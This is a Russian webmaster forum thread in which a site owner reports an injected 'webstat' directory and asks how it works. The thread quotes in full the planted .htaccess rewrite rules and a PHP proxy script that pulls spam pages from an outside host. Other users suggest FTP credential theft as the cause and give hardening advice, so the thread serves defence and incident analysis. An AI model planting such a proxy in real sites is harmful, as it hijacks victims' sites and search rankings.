X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Сторонний каталог на сайте
r0mZet
r0mZet
Topic Starter сообщение 20.11.2013, 10:50; Ответить: r0mZet
Сообщение #1


Как то раз захожу в Явебмастер, смотрю у одного сайта проиндексировано 300 страниц, мне показалось это очень странным потому что примерно неделю назад в индексе было около сорока. При этом я точно знаю что новый контент ни кем не добавлялся. Когда открыл "Содержимое сайта" оказалось много левых страниц появилось стеройдов, анаболиков типо как:

http://site.ru/webstat/vyb/skolko-stoit-bmx-v-samare-i-gde-mozhno-kupit.html


Смутил тот факт, что появилась новая директория "webstat". Когда залез на сайт через ФТП, то в этой папке было 2 файла .htaccess и index.php

И так о содержимом в .htaccess:

RewriteEngine On
RewriteBase /webstat
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule index.php.* - [L]
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*) index.php?id=$1


Содержимое index.php:

<?php
if(file_exists('redsed.php'))
{
  include_once 'redsed.php';
}
$id = isset($_GET['id']) ? $_GET['id'] : '';
$url = "http://rpy34uk.ru/$id";
$data = array('terminal' => 'site.ru/webstat');
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$html = curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$type = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
curl_close($ch);
if($code == 404)
{
  header("HTTP/1.0 404 Not Found");
}
header("Content-Type: $type");
echo $html;


Уважаемые участники форума, может ли кто-нибудь сказать о том как мог попасть сторонний каталог и несколько слов об этих файлах в качестве объяснялки как оно все работает. Всем заранее спасибо)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Prosat
Prosat
сообщение 20.11.2013, 19:51; Ответить: Prosat
Сообщение #2


Если это Ваш сайт, и Вы не включили его в систему типа Liex для размещения статей, то кто то его просто взломал и использует в своих целях. Кстати папка webstat обычно используется хостером для скрипта анализа типа Awstat
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
sosnovskij
sosnovskij
сообщение 21.11.2013, 11:08; Ответить: sosnovskij
Сообщение #3


папка webstat обычно используется хостером для скрипта анализа типа Awstat

ее, скорее всего, и использовали, потому что она есть практически везде :D


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
r0mZet
r0mZet
Topic Starter сообщение 21.11.2013, 12:51; Ответить: r0mZet
Сообщение #4


там все эти новые урлы открывают совершенно иной сайт.
Хостер у меня такими вещами не занимался
Сайт не добавлялся в Liex и подобные ему
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ssabbass
ssabbass
сообщение 21.11.2013, 16:35; Ответить: ssabbass
Сообщение #5


Тогда Delete (если, конечно, не зарабатываете на продаже ссылок), смена паролей, ограничения доступа для зарегистрированных пользователей, установка лицензионного FTP -сервиса и обновление антивирусной базы.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
r0mZet
r0mZet
Topic Starter сообщение 21.11.2013, 17:50; Ответить: r0mZet
Сообщение #6


Разумеется я это учту, спасибо за совет.
Мне интересно каким методом оно туда попало. РНР-инклудом... или как-то еще =(
признаков шелла я так и не нашел
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ssabbass
ssabbass
сообщение 21.11.2013, 20:20; Ответить: ssabbass
Сообщение #7


По разному бывает. Свой движок - свои дырки. А кроме этого, могли вычислить ваш FTP. К примеру, одно время у меня воровал пароли от ФТП мой же Тотал Коммандер, который был скачан неизвестно откуда. После установки лицензии проблема исчезла. Взламывали через форму регистрации или комментарии каким-то образом. Потом ведь куча левых ссылок во всяких плагинах, модулях и др.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
r0mZet
r0mZet
Topic Starter сообщение 21.11.2013, 20:56; Ответить: r0mZet
Сообщение #8


А ведь и правда... про ФТП-клиент я даже и не подумал
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Prosat
Prosat
сообщение 21.11.2013, 20:57; Ответить: Prosat
Сообщение #9


В качестве проги для доступа по FTP рекомендую WinSCP - работает в 3-х режимах - SFTP, SCP и FTP Полностью русифицирован и наиболее безопасен из всех которые я использовал. Главное не сохранять пароли в програме а вводить когда нужно воспользоваться прогой.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ssabbass
ssabbass
сообщение 21.11.2013, 22:02; Ответить: ssabbass
Сообщение #10


Кстати, если уж совсем нужно обезопасить вход по FTP, то на хостинге эту функцию можно периодически отключать. Т.е. вы внесли необходимые коррективы с помощью ФТП, а потом просто закрыли такую возможность через админку хостинга до того раза, когда снова потребуется произвести подключение. Тогда уж никакие взломщики ФТП будут не страшны. А заодно, можно проверить: продолжились взломы или прекратились, чтобы как-то локализовать проблему и выяснить, откуда именно вас взламывают.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Бурж (eng) Вечные ссылки аутрич (каталог 6000+), PBN (20000+). Crypto, Pharma, Gambling
+Создание своих сеток, ликбилдинг под ключ
3 karabaslinks 1288 20.3.2024, 17:28
автор: karabaslinks
Горячая тема (нет новых ответов) CryptoCloud — прием USDT, BTC, ETH, LTC на любом сайте
34 CryptoCLoud 10080 18.3.2024, 16:56
автор: CryptoCLoud
Открытая тема (нет новых ответов) Странный трафик на сайте длительное время
26 TABAK 7542 16.3.2024, 17:31
автор: Boymaster
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыБыстрый и качественный обмен на сайте Baksman.org
Обмен Bitcoin, BTC-e, PM, Qiwi, Yandex money, Карты банк
51 Baksman 33209 15.3.2024, 21:14
автор: Baksman
Открытая тема (нет новых ответов) Алтуально ли заработок на сайте?
Оцение пожалуйста идею
10 hitman20 1780 1.2.2024, 5:37
автор: Liudmila


 



RSS Текстовая версия Сейчас: 29.3.2024, 16:48
Дизайн